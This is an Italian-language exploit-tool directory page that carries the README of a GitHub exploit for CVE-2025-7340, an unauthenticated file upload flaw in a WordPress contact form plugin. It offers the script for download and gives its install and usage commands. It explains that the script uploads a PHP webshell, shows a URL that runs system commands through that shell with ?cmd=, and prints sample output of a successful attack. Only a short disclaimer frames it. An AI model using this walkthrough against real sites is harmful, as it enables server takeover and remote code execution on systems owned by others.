Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-7340 — HT Contact Form Widget For Elementor Page Builder & Gutenberg Blocks & Form Builder. <= 2.2.1 - Caricamento Arbitrario di File non Autenticato | Kitploit
Strumenti/GitHubGitHub/nxploited/cve-2025-7340
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubnxploited/cve-2025-7340

CVE-2025-7340

HT Contact Form Widget For Elementor Page Builder & Gutenberg Blocks & Form Builder. <= 2.2.1 - Caricamento Arbitrario di File non Autenticato

Vedi Repository
731 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🚨 HT Contact Form Widget <= 2.2.1 - Caricamento Arbitrato di File Non Autenticato (CVE-2025-7340)

CVE: CVE-2025-7340
CVSS: 9.8 (Critico)

📝 Descrizione

Il plugin HT Contact Form Widget For Elementor Page Builder & Gutenberg Blocks & Form Builder. per WordPress è vulnerabile a caricamenti arbitrari di file a causa della mancanza di validazione del tipo di file nella funzione temp_file_upload in tutte le versioni fino alla 2.2.1 inclusa.

Ciò consente ad aggressori non autenticati di caricare file arbitrari sul server, portando potenzialmente a Esecuzione di Codice Remoto (RCE).


⚡ Script di Exploit

Questo repository include uno script Python di exploit che automatizza la scoperta del form vulnerabile e carica una webshell sul sito interessato.

Lo script rileva in modo intelligente i parametri richiesti (nonce, form_id, endpoint ajax) e carica una shell PHP nel percorso vulnerabile.

✅ Esempio di URL del form vulnerabile:

http://target.com/contact/

✅ Il form vulnerabile deve essere sulla pagina che passi all'opzione -u.


📦 Requisiti

Prima di eseguire lo script, installa i moduli Python richiesti:

pip install -r requirements.txt

Contenuto di requirements.txt:

requests
colorama

🧰 Utilizzo

usage: CVE-2025-7340.py [-h] 

Exploit per CVE-2025-7340 - Caricamento Arbitrato di File Non Autenticato | di Khaled Alenazi (Nxploited)

options:
  -h, --help     mostra questo messaggio di aiuto ed esci
  -u, --url URL  URL del target es. http(s)://target.com

Opzioni:

OpzioneDescrizione
-h, --helpMostra questo messaggio di aiuto ed esci
-u, --url URLURL del target es. http(s)://target.com/contact

🐚 Utilizzo della Webshell

Una volta che l'exploit viene completato con successo, puoi accedere alla shell caricata al percorso indicato.

Aggiungi ?cmd=<comando> per eseguire comandi di sistema.

✅ Esempio:

http://target.com/wp-content/uploads/ht_form/temp/shell.php?cmd=whoami

🖥️ Esempio di Output

Avvio exploit contro il target...
Recupero della pagina target...
Estrazione dei parametri...
Nonce estratto: 346c441903
Endpoint AJAX: http://nxploit.ddev.site/wp-admin/admin-ajax.php
ID Form: 86
Generazione webshell...
Caricamento shell, attendere...

[+] Exploit completato con successo!

Vai a: wp-content/uploads/ht_form/temp/687590d90ac1c-shell.php

Exploit di: Khaled Alenazi (Nxploited) - GitHub: https://github.com/Nxploited

🛑 Disclaimer

Questo strumento è fornito solo a scopo educativo e di ricerca.
L'autore non è responsabile per eventuali danni o usi impropri di questo codice.
Ottieni sempre il permesso esplicito prima di testare su qualsiasi sistema.


👨‍💻 Autore

Khaled Alenazi (Nxploited)
GitHub: Nxploited

Scarica lo strumento